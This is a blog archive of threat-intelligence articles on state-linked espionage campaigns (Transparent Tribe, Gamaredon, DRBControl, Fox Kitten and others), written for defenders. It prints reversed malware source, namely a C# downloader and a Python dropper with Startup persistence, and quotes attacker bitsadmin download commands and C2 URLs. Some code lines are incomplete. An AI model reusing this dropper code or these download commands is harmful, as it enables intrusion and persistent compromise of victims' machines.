Category Archives: APT

Exclusive: Pakistan and India to armaments: Operation Transparent Tribe is back 4 years later

Exclusive: Pakistan and India to armaments. Researchers from Cybaze-Yoroi ZLab gathered intelligence on the return of Operation Transparent Tribe is back 4 years later


The Operation Transparent Tribe was first spotted by Proofpoint Researchers in Feb 2016, in a series of espionages operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrate information, take screenshot and record webcam streams.

This threat actor has vanished for a long period, and only the last month appeared another time probably for the actual tensions between two countries. We noticed that the TTP of the group is almost the same leveraging a weaponized document with a fake certificate of request of an Indian public fund. So, Cybaze-Yoroi ZLab team decided to dive deep into technical analysis.

Technical Analysis

ThreatNew Operation Transparent Tribe Campaign
Brief DescriptionMalicious macro document of the new Campaign of Transparent Tribe

Table 1. Static information about the malicious macro 

The document presents itself as a request for a DSOP FUND (Defence Services Officers Provident Fund). It is a fund where an officer compulsorily deposits some money to Govt on a monthly basis out of his wages / salary. 

The Fund is financial planning for defense personnel. The money is kept by the government and in return, a “non-permanent” profit officially titled as “interest” is given back to the officers at the end of each year. The DSOP fund scheme has been set up as a “welfare measure” to the depositors while the wages remain barely meeting ends otherwise.

Figure 1: Piece of the malicious document employed in the Op. Transparent Tribe

Self-Extracting Macro

Analyzing the content of the Excel file, we notice that the file contains all the necessary components to perform the infection:

Figure 2: Piece of the malicious macro

The macro is not heavily obfuscated. The macro components are hidden as Hex or Decimal strings, which will be combined with each other to unleash the next stage of the infection.

Then it is possible to deobfuscate them.

Figure 3: Extracted component from the macro

The macro creates two folders inside %PROGRAMDATA% path, “systemidleperf” and “SppExtComTel”. 

Figure 4: Extracted files

Analyzing these files, we have a vbs script, a C# script and a zip file, inside this archive we found 4 PE artifacts:

Figure 5: Content of the “” file

The SilentCMD Module

The two dll are legit windows library and are used in support of the malicious behaviour. Instead, the “windproc.scr” and “windprocx.scr” files are the compiled version of the utility SilentCMD publicly available on GitHub. SilentCMD executes a batch file without opening the command prompt window. If required, the console output can be redirected to a log file.

Figure 6: SilentCMD main routine

The SilentCMD utility is used to execute the commands pushed from the C2, and all of them will be executed without showing anything to the user. However, as previously mentioned, it is curious to notice that the malware installs two different variants of the executable, with the only difference in timestamp:

Figure 7: Comparison between the two files

The Real Time Module

The other extracted file is the “Realtime.cs” file, which is the source of a piece of code written in C#, and it is compiled and run during the execution of the macro. The code is very simple and it has the only purpose to download another component from the internet: 

  1. using System;
  2. using System.Collections.Generic;
  3. using System.Diagnostics;
  4. using System.IO;
  5. using System.Net;
  6. using System.Text;
  7. namespace Realtime
  8. {
  9. class Program
  10. {
  11. static void Main(string[] args)
  12. {
  13. WebClient wc = new WebClient();
  14. wc.DownloadFile(“”, @”c:\\programdata\\systemidleperf\\x64i.scr”);
  15. Process proc = new Process();
  16. proc.StartInfo.FileName = Convert.ToString(args[0]);
  17. proc.StartInfo.Arguments = “/c ” + Convert.ToString(args[1]);
  18. proc.StartInfo.UseShellExecute = false;
  19. proc.StartInfo.CreateNoWindow = false;
  20. proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
  21. proc.Start();
  22. Environment.Exit(0);
  23. //Application.Exit();
  24. /* if (!proc.Start())
  25. {
  26. //Console.WriteLine(“Error starting”);
  27. return;
  28. }*/
  29. //proc.WaitForExit();
  30. }
  31. }
  32. }

Code snippet 1

The code is really simple, it has the function of downloading the file “x64i.scr” from the dropurl “awsysclou[.com” and then saves it into the folder “c:\programdata\systemidleperf\”. The file is immediately executed through the C# primitives.

The X64i.scr File

ThreatNew Operation Transparent Tribe Campaign
Brief DescriptionPython stub malware of the new Campaign of Transparent Tribe

Table 2. Static information about the Pyhton Stub

The icon of the executable let us understand that the malware has been forged through the usage of the tool Pyinstaller. It is a tool that permits a user to create a complete self-contained executable starting from a python source code. However, the two main disadvantages of choosing this solution are the high footprint of the executable (reaching more than 7.5MB and this generates a lot of noise inside the system); and the easiness to reverse the executable to obtain the source code.

So, after the operation of reversing, the extracted code of the malware is the following:

  1. from ctypes import *
  2. import socket, time, os, struct, sys
  3. from ctypes.wintypes import HANDLE, DWORD
  4. import platform
  5. import ctypes
  6. import _winreg
  7. import time
  8. import os
  9. import platform
  10. import binascii
  11. import _winreg
  12. import subprocess
  13. bitstream3 = “PAYLOAD_ONE”
  14. bitstream4 = “PAYLOAD_TWO”
  15. oses =
  16. systems = platform.system()
  17. releases = platform.release()
  18. architectures = platform.architecture()[0]
  19. def main():
  20. try:
  21. runsameagain()
  22. except Exception as e:
  23. print str(e)
  24. def runsameagain():
  25. global bitstream3
  26. binstr = bytearray(binascii.unhexlify(bitstream3))
  27. if not os.path.exists(“c:\programdata\SppExtComTel”):
  28. os.makedirs(“c:\programdata\SppExtComTel”)
  29. WriteFile(“c:\programdata\SppExtComTel\SppExtComTel.scr”,binstr);
  30. bootup()
  31. subprocess.Popen([“c:\programdata\SppExtComTel\SppExtComTel.scr”, ‘–brilliance’])
  32. def rundifferentagain():
  33. global bitstream4
  34. binstr = bytearray(binascii.unhexlify(bitstream4))
  35. if not os.path.exists(“c:\programdata\SppExtComTel”):
  36. os.makedirs(“c:\programdata\SppExtComTel”)
  37. WriteFile(“c:\programdata\SppExtComTel\SppExtComTel.scr”,binstr);
  38. bootup()
  39. subprocess.Popen([“c:\programdata\SppExtComTel\SppExtComTel.scr”, ‘–brilliance’])
  40. def Streamers():
  41. try:
  42. rundifferentagain()
  43. return 1
  44. except Exception as e:
  45. print str(e)
  46. def WriteFile(filename,data):
  47. with open(filename,”wb”) as output:
  48. output.write(data)
  49. def bootup():
  50. try:
  51. from win32com.client import Dispatch
  52. from import shell,shellcon
  53. dpath = “c:\programdata\SppExtComTel”
  54. #print “before”
  55. Start_path = shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0)
  56. com_path = os.path.join(Start_path, “SppExtComTel.lnk”)
  57. target = os.path.join(dpath,”SppExtComTel.scr”)
  58. wDir = dpath
  59. icon = os.path.join(dpath, “SppExtComTel.scr”)
  60. shell = Dispatch(‘WScript.Shell’)
  61. shortcut = shell.CreateShortCut(com_path)
  62. shortcut.Targetpath = target
  63. shortcut.WorkingDirectory = wDir
  64. shortcut.IconLocation = icon
  66. #print “there”
  67. #return True
  68. except Exception, e:
  69. print str(e)
  70. if __name__ == “__main__”:
  71. try:
  72. #print oses
  73. #print systems
  74. #print releases
  75. #print architectures
  76. if ‘.py’ not in sys.argv[0]:
  77. #sys.exit()
  78. #print “nothign to do”
  79. if systems == ‘Windows’ and releases == “7”:
  80. main()
  81. elif systems == ‘Windows’ and (releases == “8.1” or releases == “8”):
  82. Streamers()
  83. elif systems == ‘Windows’ and releases == “10”:
  84. #print “Please use a 64 bit version of python”
  85. #print “entering streamers”
  86. Streamers()
  87. else:
  88. Streamers()
  89. except Exception as e:
  90. print str(e)

Code snippet 2 

The python code is very simple to analyze and to explain. The first operation is to declare two global variables, “bitstream3” and “bitstream4”. They are the hexadecimal representation of two PE files, that will be deepened in the next sections. These two files are chosen according to the Windows OS version, as visible at the bottom of the code.

After that, the script writes the desired payload into the folder “c:\programdata\SppExtComTel\” and immediately executed it with the parameter “–brilliance”. After that, the malware guarantees its persistence through the  creation of a LNK file inside the Startup folder.

Figure 8: Persistence mechanism


Figure 9: Static information about the Rat

As previously stated, the malware payload is the core component of the malware implant. 

As shown in the above figure, the malware is written in .NET framework and the creation date back to 29 Jan 2020. It is the date of the beginning of the malware campaign, also demonstrated by the registration records of the C2. The malware consists of a modular implant that downloads other components from the C2.

The first operation is to provide to the C2 a list of the running processes on the victim machine: 

Figure 10: C2 communication

The method used to send the information to the C2 is the following: 

Figure 11: C2 communication routine

After that, the malware loops in a cycle and waits for some commands coming from the C2:

Figure 12: Routine for the download of new modules

When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs:

  • http[://awsyscloud[.com/E@t!aBbU0le8hiInks/B/3500/m1ssh0upUuchCukXanevPozlu[.dll
  • http[://awsyscloud[.com/E@t!aBbU0le8hiInks/D/3500/p2ehtHero0paSth3end.dll

The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: 

Figure 13: Evidence of the decrypting routine of the certificate

The above screen shows that the malware requests for an RSA key, which has to be validated by the highlighted text. If the check is positive, the malware can go on to its malicious actions, such as sending of information: 

Figure 14: Sending routine of the malware

The second malware module is a simple DLL having the purpose to download other components from the dropURL and then install it:

Figure 15: Evidence of the hard-coded AES key

The downloaded code has been encrypted through the Rijndael algorithm with a hard-coded key.


The Transparent tribe is back with a new campaign after several years of (apparently) inactivity. We can confirm that this campaign is completely new, relying on the registration record of the C2 that dates back to 29 January 2020. The decoy document presents itself as a request for a DSOP FUND  (Defence Services Officers Provident Fund) a providence fund for official and military personnel, confirming the espionage and counterintelligence character of this campaign. 

At last, we have no certainty that this campaign has been inactive for 4 years, it may be that it acted quietly, but, now the cyber criminal group is back in view of today’s tensions between the two countries.

Additional technical details, including Indicators of Compromise and Yara Rules, are reported in the analysis published by ZLab available here:

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Transparent Tribe)

The post Exclusive: Pakistan and India to armaments: Operation Transparent Tribe is back 4 years later appeared first on Security Affairs.

M-Trends 2020: Insights From the Front Lines

Today we release M-Trends 2020, the 11th edition of our popular annual FireEye Mandiant report. This latest M-Trends contains all of the statistics, trends, case studies and hardening recommendations that readers have come to expect through the years—and more.

One of the most exciting takeaways from this year’s report: the global median dwell time is now 56 days. That means the average attacker is going undetected on a network for under two months—an M-Trends first. This is a very promising statistic that demonstrates how far we’ve come since 2011 when the global median dwell time was 416 days. And yet, we know a sophisticated attacker needs only a few days to gain access to the crown jewels, so there is still plenty of room for improvement.

Another interesting statistic in the report is what we refer to as "detection by source." For the first time since 2015, the majority of organizations are being notified of compromises by external sources (53 percent) over internal teams (47 percent). This is more likely due to factors such as increases in law enforcement notifications and compliance changes, and less likely due to internal teams having lost a step.

There’s a whole lot more to look forward to in M-Trends 2020, including:

  • By the Numbers: Global median dwell time and detection by source are just the tip of the iceberg—we share a number of other statistics related to targeted industries, malware, threat techniques and more.
  • Newly Named APT Groups: Learn all about APT41, group responsible for carrying out Chinese state-sponsored espionage and financially motivated activity since as far back as 2012.
  • Trends: We take a deep dive into the latest trends involving malware families, monetizing ransomware, crimeware as a service, and malicious insiders.
  • Case Studies: With so many organizations moving to the cloud, we take a look at a breach involving cloud assets. We also take readers through a campaign where attackers were targeting gift cards.

While M-Trends 2020 contains plenty of new information, the goal of M-Trends has remained the same since the beginning: to arm security professionals with details on the latest attacks and threats we are seeing during our engagements.

Download the 11th edition of M-Trends today.

DRBControl cyber-espionage group targets gambling, betting companies

The DRBControl APT group has been targeting gambling and betting companies worldwide with malware that links to two China-linked APT groups.

Security researchers from TrendMicro have uncovered a cyber espionage campaign carried out by an APT group tracked as DRBControl that employed a new family of malware. The attackers aimed at stealing databases and source code from gambling and betting companies in Southeast Asia, and likely in Europe and the Middle East.

“The threat actor is currently targeting users in Southeast Asia, particularly gambling and betting companies. Europe and the Middle East were also reported to us as being targeted, but we could not confirm this at the time of writing.” reads the analysis published by Trend Micro. “Exfiltrated data was mostly comprised of databases and source codes, which led us to believe that the group’s main purpose is cyberespionage.”

Trend Micro become aware of the new backdoor after the group targeted a company in the Philippines using both common and custom malware and exploitation tools.

Threat actors used two previously unidentified backdoors, known malware families such as PlugX and the HyperBro backdoor, as well as custom post-exploitation tools. One of the backdoors leverages the file hosting service Dropbox as command-and-control (C&C).

The group was also observed using modified versions of common malware such as PlugX RAT, Trochilus RAT, keyloggers using the Microsoft Foundation Class (MFC) library, the custom in-memory HyperBro backdoor, and a Cobalt Strike sample.

The arsenal of the attackers includes post-exploitation tools such as password dumpers (Quarks PwDump, modified Mimikatz, NetPwdDump), tools for bypassing UAC, and code loaders.

In the DRBControl’s arsenal experts recognized two main backdoors (Type 1 and Type 2) that were previously unknown in the threat landscape.

Another backdoor accompanies Type 1 and has the role of executing malware that has been downloaded from Dropbox and loaded in memory.

Type 1 backdoor is executed by employing DLL side-loading, it executes a malware that has been downloaded from Dropbox and loaded in memory.

The malware was used to steal Office and PDF documents, key logs, SQL dumps, browser cookies, a KeePass manager database.

The type 2 backdoor uses a configuration file that includes the C&C domain and connection port, as well as the directory and filename where the malware is copied. The configuration file is obfuscated in a registry key in order to achieve persistence.

Both backdoors implement a User Account Control mechanism bypass, they also implement a keylogging feature.

Researchers observed that a first variant of the Type 1 backdoor was released in late May, 2019, while version 9.0 is dated October, 2019.

The Type 2 backdoor was first released in July 2017, it was employed in a spear-phishing attack distributing a weaponized Microsoft Word document.


This circumstance suggests that DRBControl has been active at least since 2017, but Trend Micro speculates it had a longer run.

Trend Micro experts believe that this is the first time that the DRBControl group is tracked by the security experts. The researchers linked the DRBControl to other China-linked APT groups, including Winnti and Emissary Panda (a.k.a. BRONZE UNION, APT27, Iron Tiger, LuckyMouse).

Evidence of the links to the Winnti group includes from mutexes, domain names and issued commands.

Researchers noticed that the attackers used two commands issued on a compromised machine to download malicious executables from a domain. One of the executables (t32d.exe) was used in the past to contact a different domain name involved campaigns associated with the Winnti infrastructure.

  • bitsadmin /transfer n http://185.173.92[.]141:33579/i610.exe c:\users\public\wget.exe
  • bitsadmin /transfer n http://185.173.92[.]141:33579/t32d.exe c:\users\public\wget.exe

Experts pointed out that the HyperBro backdoor is exclusive to Emissary Panda.

At the time it is not possible to associate with high confidence the DRBControl group with a specific threat actor, it is not completely clear if the attackers belong to a new APT group or it is a subgroup of a known APT group linked to China.

“Attribution is a complicated aspect of cybersecurity, and it is not the goal of this publication. What we have discovered in our analysis, however, is the existence of a significant number of indicators of compromise (IoCs) and intriguing connections with at least two known APT groups.” concludes TrendMicro.

“The threat actor described here shows solid and quick development capabilities regarding the custom malware used, which appears to be exclusive to them. The campaign exhibits that once an attacker gains a foothold in the targeted entity, the use of public tools can be enough to elevate privileges, perform lateral movements in the network, and exfiltrate data.”

Additional technical details, such as IoCs, are included in the report published by TrendMicro.

Pierluigi Paganini

(SecurityAffairs – hacking, DRBControl)

The post DRBControl cyber-espionage group targets gambling, betting companies appeared first on Security Affairs.

Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign

Security experts from Yoroy-Cybaze ZLab have conducted a detailed analysis of an implant used by the Gamaredon APT group in a recent campaign.


Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB (Federal Security Service) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power. 

Gamaredon has been active since 2014, and during this time, the modus operandi has remained almost the same. The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines. It is distributed in a spear-phishing campaign with a weaponized office document that appears to be designed to lure military personnel. 

In recent months, Ukrainian CERT (CERT-UA) reported an intensification of Gamaredon Cyberattacks against military targets. The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez. Starting from those findings, Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant.

Technical Analysis

The complex infection chain begins with a weaponized Office document named “f.doc”. In the following table the initial malware information is provided.

ThreatGamaredon Pteranodon weaponized document
Brief DescriptionDoc file weaponized with Exploit

Table 1. Information about initial dropper

The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it, and, once opened, it appears as in the following figure.

Figure 1. Overview of the document

The document leverages the common exploit aka CVE-2017-0199 and tries to download a second stage from “hxxp://win-apu.]ddns.]net/apu.]dot”.

Figure 2. URL used by document to download the second stage

Thanks to this  exploit (Remote Code Execution exploit) the user interaction is not required, in fact the “enable macro” button is not shown. The downloaded document has a “.dot” extension, used by Microsoft Office to save templates for different documents with similar formats. Basic Information on the “.dot” file are provided:

ThreatGamaredon Pteranodon loader dot file
Brief DescriptionDot file enabling the infection of the Gamaredon Pteranodon

Table 2. Information about second stage

If we decide to open the document, we see that the document is empty, but it requires the enabling of the macro.

Figure 3. Overview of the second stage document

The body of the macro can be logically divided into two distinct parts: 

  • The first one is the setting of the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & _”\Word\Security\” and the declaration of some other variables, such as the dropurl “get-icons.]”;
  • The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “templates.vbs”. This vbs is properly the macro executed by the macro engine of word
Figure 4. Code of the “template.vbs” stored in the Startup folder

The evidence of the written file in the Startup folder:

Figure 5. Evidence of the “template.vbs” file in the Startup folder

Analyzing the content of “templates.vbs” it is possible to notice that it define a variable containing a URL like “hxxp://get-icons.]ddns.]net/ADMIN-PC_E42CAF54//autoindex.]php” obtained from “hxp://get-icons.]ddns.]net/” & NlnQCJG & “_” & uRDEJCn & “//autoindex.]php”, where “NlnQCJG” is the name that identifies the computer on the network and “uRDEJCn” is the serial number of drive in hexadecimal encoding. From this URL it tries to download another stage then storing it into “C:\Users\admin\AppData\Roaming\” path with random name. At the end, “templates.vbs” script will force the machine to reboot. 

Figure 6. Function used to force machine reboot

The dropped sample is an SFX archive, like the tradition of Gamaredon implants.

ThreatGamaredon Pteranodon implant SFX archive
Brief DescriptionSFX Archive First Stage 

Table 3. Information about first SFX archive

By simply opening the SFX archive, it is possible to notice two different files that are shown below and named respectively “8957.cmd” and “28847”. 

Figure 7. Content of the Gamaredon Pteranodon  SFX archive

When executed, the SFX archive will be extracted and the “8957.cmd” will be run. The batch script looks like the following screen:

Figure 8. Bat script source code (with junk instructions)

It contains several junk instructions with the attemption to make the analysis harder. Cleaning the script we obtain:

Figure 9. Batch script source code (cleaned)

At this point, the batch script renames the “28847” file in “28847.exe”, opens it using “pfljk,fkbcerbgblfhs” as password and the file contained inside the “28847.exe” file will be renamed in “WuaucltIC.exe”. Finally, it will be run using “-post.php” as argument.

The fact that the “28847.exe” file can be opened makes us understand that  the “28847” file is another SFX file. Some static information about SFX are:

ThreatGamaredon Pteranodon implant SFX archive
Brief DescriptionSFX Archive Second Stage

Table 4. Information about the second SFX archive

Exploring it, it is possible to see several files inside of it,  as well as the 6323 file. The following figure shows a complete list.

Figure 10. Content of the second SFX archive

In this case, the SFX archive contains 8 files: five of them are legit DLLs used by the “6323” executable to interoperate with the OLE format defined and used by Microsoft Office. The “ExcelMyMacros.txt” and “wordMacros.txt” files contain further macro script, described next. So, static analysis on the “6323” file shown as its nature: it is written using Microsoft Visual Studio .NET, therefore easily to reverse. Before reversing the executable, it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code. The below image shows the information about the sample before and after the cleaning. 

Figure 11. Static information about .NET sample before and after the cleaning

The source code looks as follows. 

Figure 12. Part of .NET sample source code

The first check performed is on the arguments: if the arguments length is equal to zero, the malware terminates the execution. After that, the malware checks if the existence of the files “ExcelMyMacros.txt” and “wordMacros.txt” in the same path where it is executed: if true then it reads their contents otherwise it will exit. 

Figure 13. Function used by .NET sample to check the presence of the “WordMacros.txt” and the “ExcelMyMacros.txt” files”

Part of the content of the variable “xVGlMEP”:

Figure 14.Piece of the “WordMacros.txt” code

There is a thin difference between the two files. 

Figure 15. Difference between “WordMacros.txt” and  “ExcelMyMacros.txt” files”

As visible in the previous figure, the only difference between the files are in the variable, registry key and path used by Word rather than by Excel. Finally the macros are executed using the Office engine like in the following figure. 

Figure 16. Winword with malicious macro

So let’s start to dissect the macros. For a better comprehension we will be considering only one macro and in the specific case we will analyze “wordMacros.txt”  ones. First of all the macro will set the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & _”\Word\Security\” and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes: the first one will run a “IndexOffice.vbs” in the path “%APPDATA%\Microsoft\Office\” and the second one will run “IndexOffice.exe” in the same path. 

Figure 17. Registry keys and Scheduled tasks set by malware

Finally, the malware will write the “IndexOffice.txt” file in the  “%APPDATA%\Microsoft\Office\” path. The following figure shows what has been previously described:

Figure 18. Part of “IndexOffice.txt” file

The script will check the presence of the  “IndexOffice.exe” artifact: if true then it will delete it and it will download a new file/script from “hxxp://masseffect.]space/<PC_Name>_<Hex_Drive_SN>/post.]php”. 

Figure 19. Domain “masseffect.]space” declaration and use of the Encode function

The malware tries to save the C2 response and encoding it using Encode function. This function accepts three parameters: the input file, the output file and the arrKey; arrKey is calculated thanks to  GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results. Part of Encode function and complete code of GetKey function are shown below.

Figure 20. Encode function 
Figure 21. Function GetKey

Visiting the web page relative to C2, it shows a “Forbidden message” so this means that the domain is still active but refuses incoming requests.

Figure 22. Browser view of the URL “masseffect.]space” 


Gamaredon cyberwarfare operations against Ukraine are still active. This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years. 

The massive use of weaponized Office documents, Office template injection, sfx archives, wmi and some VBA macro stages that dynamically changes,  make the Pterodon attack chain very malleable and adaptive. However, the introduction of a .Net component is a novelty compared to previous Pterodon samples.

Further technical details, including Indicators of Compromise and Yare rules, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB

Pierluigi Paganini

(SecurityAffairs – hacking, Gamaredon)

The post Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign appeared first on Security Affairs.

Fox Kitten Campaign – Iranian hackers exploit 1-day VPN flaws in attacks

Iranian hackers have been hacking VPN servers to plant backdoors in companies around the world

Iran-linked attackers targeted Pulse Secure, Fortinet, Palo Alto Networks, and Citrix VPNs to hack into large companies as part of the Fox Kitten Campaign.

During the last quarter of 2019, experts from security firm ClearSky uncovered a hacking campaign tracked as Fox Kitten Campaign that is being conducted in the last three years.

The campaign targeted dozens of companies and organizations in Israel and around the world, experts pointed out that the most successful and significant attack vector used by the Iranian hackers was the exploitation of unpatched VPN and RDP services.

Iran-linked hackers have targeted companies from different sectors, including IT, Telecommunication, Oil, and Gas, Aviation, Government, and Security”

“This attack vector is not used exclusively by the Iranian APT groups; it became the main attack vector for cybercrime groups, ransomware attacks, and other state-sponsored offensive groups.” reads the report published by ClearSky.

“We assess this attack vector to be significant also in 2020 apparently by exploiting new vulnerabilities in VPNs and other remote systems (such as the latest one existing in Citrix). Iranian APT groups have developed good technical offensive capabilities and are able to exploit 1-day vulnerabilities in relatively short periods of time, starting from several hours to a week or two.”

Experts explained that Iranian hackers have focused their interest in 1-day flaws and developed a significant capability in developing working exploits for them that were employed in their operations.

ClearSky confirms that Iranian APT groups in some cases exploited VPN vulnerabilities within hours after their public disclosure.

The investigation Fox Kitten Campaign revealed an overlap, with medium-high probability, between the infrastructure used by the attackers and the one associated to attacks carried out by other Iran-linked APT groups, such as APT34, the APT33, and APT39

In 2019, Iran-linked APT groups were able to quickly exploit the vulnerabilities in the Pulse Secure “Connect” VPN (CVE-2019-11510), the Fortinet FortiOS VPN (CVE-2018-13379), and Palo Alto Networks “Global Protect” VPN (CVE-2019-1579).

The attacks exploiting the above issued were initially detected at the end of August, recently Iran-linked hackers also employed exploits for CVE-2019-19781 Citrix “ADC” VPN flaw in their attacks.

Attackers exploit the VPN flaws to access the enterprise networks, infect systems with a backdoor and from them make move laterally to compromise other computers on the internal network.

After the attackers have exploited vulnerabilities in the VPN systems to breach in the target network, they perform several actions and used multiple tools to maintain their foothold in the network with high privileges.

The list of privilege escalation tools used by hackers includesJuicy Potato,’ Procdump, Mimikatz, and Sticky Keys.

The threat actors also used legitimate software like Putty, Plink, Ngrok, Serveo, or FRP in their attacks.

ClearSky also reported the use of the following custom-made malware:

  • STSRCheck – Self-development databases and open ports mapping tool.
  • POWSSHNET – Self-Developed Backdoor malware – RDP over SSH Tunneling.
  • VBScript – download TXT files from the command-and-control (C2 or C&C) server and unify these files to a portable executable file.
  • Socket-based backdoor over cs.exe – An exe file used to open a socket-based connection to a hardcoded IP address.
  • Port.exe – tool to scan predefined ports an IP’s

The attacks part of the Fox Kitten Campaign observed by ClearSky aimed that gather information on the target networks and plant backdoors, but experts fear that once inside the target infrastructure the hackers could use data wiper (i.e. ZeroCleare and Dustman) in future attacks.

Further technical details on the Fox Kitten Campaign, including indicators of compromise (IOCs), are reported in the analysis published by ClearSky.

Pierluigi Paganini

(SecurityAffairs – Fox Kitten campaign, VPN)

The post Fox Kitten Campaign – Iranian hackers exploit 1-day VPN flaws in attacks appeared first on Security Affairs.

US Govt agencies detail North Korea-linked HIDDEN COBRA malware

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) released reports on North Korea-linked HIDDEN COBRA malware.

The FBI, the US Cyber Command, and the Department of Homeland Security have published technical details of a new North-Korea linked hacking operation.

The government experts released new and updated Malware Analysis Reports (MARs) related to new malware families involved in new attacks carried out by North Korea-linked HIDDEN COBRA group.

The following MARs reports aim at helping organizations to detect HIDDEN COBRA activity:

Let’s give a close look at each malware detailed in the MARs reports just released:

  • BISTROMATH – a full-featured RAT implant;
  • SLICKSHOES – a Themida-packed dropper:
  • CROWDEDFLOUNDER – a Themida packed 32-bit Windows executable, which is designed to unpack and execute a Remote Access Trojan (RAT) binary in memory;
  • HOTCROISSANT – a full-featured beaconing implant used for conducting system surveys, file upload/download, process and command execution, and performing screen captures;
  • ARTFULPIE – an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL;
  • BUFFETLINE – a full-featured beaconing implant. 

US agencies also updated information included in a MARs report on the HOPLIGHT proxy-based backdoor trojan that was first analyzed in April 2019.

Each report includes a detailed “malware descriptions, suggested response actions, and recommended mitigation techniques.”

The US Cyber Command also announced to have uploaded malware samples to VirusTotal:

CISA reports provide the following recommendations to users and administrators to strengthen the security posture of their organization’s systems:

• Maintain up-to-date antivirus signatures and engines.
• Keep operating system patches up-to-date.
• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
• Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
• Enforce a strong password policy and implement regular password changes.
• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
• Disable unnecessary services on agency workstations and servers.
• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
• Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
• Scan all software downloaded from the Internet prior to executing.
• Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Pierluigi Paganini

(SecurityAffairs – HIDDEN COBRA, malware)

The post US Govt agencies detail North Korea-linked HIDDEN COBRA malware appeared first on Security Affairs.

MoleRATs APT group targets Palestinian territories

Security experts uncovered a new cyberespionage campaign conducted by one of the Gaza Cybergang groups (aka MoleRATs) targeting the Middle East.

Experts from the Cybereason Nocturnus team have uncovered a cyber espionage campaign allegedly carried out by one of the Gaza Cybergang groups (aka MoleRATs). 

MoleRATs is an Arabic-speaking, politically motivated group of hackers that has been active since 2012, in 2018 monitoring of the group, Kaspersky identified different techniques utilized by very similar attackers in the MENA region. Kaspersky distinguished the following three attack groups operating under Gaza Cybergang umbrella:

  • Gaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;
  • Gaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;
  • Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.

As part of the last campaign spotted by Cybereason, MoleRATs has been attempting to infiltrate the systems of both organizations and individuals.

Experts distinguish between two separate campaigns happening simultaneously that were using differed hacking tools, C2 infrastructure.

The first campaign dubbed the Spark Campaign employs social engineering to infect victims with the Spark backdoor. Most of the victims were from the Palestinian territories.

“This backdoor first emerged in January 2019 and has been continuously active since then. The campaign’s lure content revolves around recent geopolitical events, espeically the Israeli-Palestinian conflict, the assassination of Qasem Soleimani, and the ongoing conflict between Hamas and Fatah Palestinian movements.” states the report from Cybereason.

According to the experts, the Spark backdoor was specifically designed my MoleRATs to gather system information on an infected machine. 

Spark will also infect victims with Arabic keyboard and language settings.

The second campaign was tracked by the experts as the Pierogi Campaign, it employes social engineering attacks to trick victims into installing an undocumented backdoor dubbed Pierogi.

“This backdoor first emerged in December 2019, and was discovered by Cybereason. In this campaign, the attackers use different TTPs and decoy documents reminiscent of previous campaigns by MoleRATs involving the Micropsia and Kaperagent malware.” states the report.

The name ‘Pierogi’ comes after an Eastern European dish, it is a simple Delphi backdoor that was allegedly created by Ukranian-speaking hackers. 

The experts did not attribute the attack to a specific state, even if the apparent political motivation suggests the involvement of a nation-state actor. 

“It is important to remember there are many threat actors operating in the Middle East, and often there are overlaps in TTPs, tools, motivation, and victimology,” concludes the report. “There have been cases in the past where a threat actor attempted to mimic another to thwart attribution efforts, and as such, attribution should rarely be taken as is, but instead with a grain of salt.” 

Additional details, including Indicators of Compromise and MITRE ATT&CK breakdown, are included in the report published by Cybereason.

Pierluigi Paganini

(SecurityAffairs – MoleRATs, )

The post MoleRATs APT group targets Palestinian territories appeared first on Security Affairs.

Microsoft Patch Tuesday updates for February 2020 fix IE 0day flaw

Microsoft February 2020 Patch Tuesday updates address a total of 99 new vulnerabilities, including an Internet Explorer zero-day exploited in the wild.

Microsoft has released the Patch Tuesday updates for February 2020 that address a total of 99 vulnerabilities, including an Internet Explorer zero-day tracked as CVE-2020-0674 reportedly exploited by the APT group.

In January, Microsoft has published a security advisory (ADV200001) that includes mitigations for the CVE-2020-0674 zero-day remote code execution (RCE) flaw.

The tech giant confirmed that the CVE-2020-0674 zero-day vulnerability has been actively exploited in the wild.

